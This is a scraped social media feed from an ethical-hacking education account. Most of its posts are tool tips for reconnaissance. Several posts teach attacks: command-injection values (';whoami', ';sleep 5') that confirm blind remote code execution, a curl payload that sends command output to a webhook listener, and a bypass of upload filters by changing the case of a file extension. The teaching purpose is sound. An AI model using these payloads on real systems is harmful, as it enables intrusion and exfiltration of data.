hackinghub_io Profile Banner
HackingHub Profile
HackingHub

@hackinghub_io

Followers
8K
Following
206
Media
56
Statuses
3K

Educating the next generation of ethical hackers.

United Kingdom
Joined April 2019
Don't wanna be here? Send us removal request.
@hackinghub_io
HackingHub
18 hours
Getting blocked by servers while using cURL?. Most sites don’t like requests from cURL and will often block it because it's a red flag for bots or scraping tools. Try changing your User-Agent header, like this:. curl " https://hackinghub[.]io" -A "<NEW-USER-AGENT>"
Tweet media one
0
8
104
@hackinghub_io
HackingHub
2 days
Install ASNMap here πŸ‘‡.
0
0
2
@hackinghub_io
HackingHub
2 days
Mapping an organization’s Autonomous System Number (ASN) is a great way to uncover IP ranges tied to your target!. Use asnmap like this:.asnmap -org <TARGET> -json | jq -r .as_number | sort -u. Combine this with tools like nmap, amass, or masscan.
Tweet media one
1
29
133
@hackinghub_io
HackingHub
3 days
Happy July 4th from all of us at HackingHub!. For this week only you can get $30 for 30 days OR $100 for lifetime access to:.πŸ’₯ Hands-On Web Exploitation by NahamSec.πŸ’₯ Linux for Hackers Fundamentals by John Hammond. Get Offer:
Tweet media one
0
4
6
@hackinghub_io
HackingHub
4 days
Summary:. πŸ’₯ Use ;sleep 5 to confirm blind RCE.πŸ’₯ Use curl with Webhook[.]site to exfiltrate output.πŸ’₯ Webhook[.]site acts as a temporary listener.πŸ’₯ Great for demos, PoCs, and beginner-friendly workflows.
0
0
4
@hackinghub_io
HackingHub
4 days
Step 4: Verify the Output at Webhook[.]site. Visit your unique Webhook[.]site URL and you’ll see a new request with the POST body: user=www-data. That confirms command output was exfiltrated successfully.
1
0
4
@hackinghub_io
HackingHub
4 days
Step 3: Exfiltrate Output Using Webhook[.]site using a payload like this:. curl -X POST -d "user=$(whoami)" https://webhook[.]site/YOUR-ID. This will send the output of whoami to your webhook URL as an HTTP POST request.
1
0
7
@hackinghub_io
HackingHub
4 days
Step 2: Use a Time-Based Payload like ;sleep 5. If the server delays its response by ~5 seconds, it confirms your command executed. This proves RCE is real, even if output is hidden.
1
0
3
@hackinghub_io
HackingHub
4 days
How to Test and Confirm RCE, Then Exfiltrate Data (no firewall):. Step 1: Test if RCE is possible with something like ;whoami. Since the app doesn’t return output (blind RCE), you need a side-channel to confirm it. Continued in thread πŸ‘‡
2
34
271
@hackinghub_io
HackingHub
5 days
If a server blocks file uploads based on extension, try changing the casing of the file extension. Many insecure filters don’t normalize case properly. Try this:.❌ .jsp β†’ βœ… .JsP.❌ .jsp β†’ βœ… .JSP.❌ .jsp β†’ βœ… .jSp. This can help you sneak past naive validations.
0
2
12
@hackinghub_io
HackingHub
6 days
@TomNomNom Install gron πŸ‘‡.
0
0
0
@hackinghub_io
HackingHub
6 days
jq syntax tends to be complex. Hats off to anyone that knows it by heart. For those of you that would prefer something more simple, try @tomnomnom's gron. It makes JSON greppable and easy to filter. Check this out πŸ‘‡
1
3
17
@hackinghub_io
HackingHub
7 days
Want to know which services a domain relies on?. Dumping TXT records with zdns is great for spotting:.πŸ’₯ Third-party services like Webflow, Google, SendGrid.πŸ’₯ Misconfigured SPF/DKIM.πŸ’₯ Shadow services
Tweet media one
0
5
39
@hackinghub_io
HackingHub
8 days
Sometimes direct IP access gets blocked but hostnames that resolve to the same IP can slip through. That’s where wildcard DNS services like come in handy. Check this out. All of these resolve to 8.8.8.8 πŸ‘‡
Tweet media one
2
16
89
@hackinghub_io
HackingHub
9 days
Celebrate the wins (even if they're dupes) πŸŽ‰
Tweet media one
1
10
83
@hackinghub_io
HackingHub
11 days
jq is such a useful tool if you're dealing with JSON data. Here's an amazing cheatsheet that you need to bookmark if you're working with JSON data and want to make the most out of jq. πŸ”– Bookmark now:
Tweet media one
1
8
41
@hackinghub_io
HackingHub
11 days
RT @RedTeamVillage_: Shoutout to @hackinghub_io for sponsoring Red Team Village at #DC33 as a Silver Sponsor! πŸ₯ˆπŸ’».Thanks for supporting the….
0
1
0
@hackinghub_io
HackingHub
12 days
So you've confirmed RCE with a ;sleep 5 payload but can't see any output?. Try using to retrieve the output indirectly. Try this payload:.curl -X POST -d "user=$(whoami)" https://webhook[.]site/YOUR-ID. The result of whoami is sent to your webhook URL!
Tweet media one
0
3
20
@hackinghub_io
HackingHub
14 days
This is the quickest way to install and manage all of the amazing @pdiscoveryio tools:. βœ… Install all: pdtm -ia.πŸ” Update all: pdtm -ua.❌ Remove all: pdtm -ra (not sure why you'd need this one tbh)Β . Useful when setting up a new VPS!Β . Install pdtm πŸ‘‡.
0
4
22
@hackinghub_io
HackingHub
15 days
Want to test this out? Try this lab:
0
0
3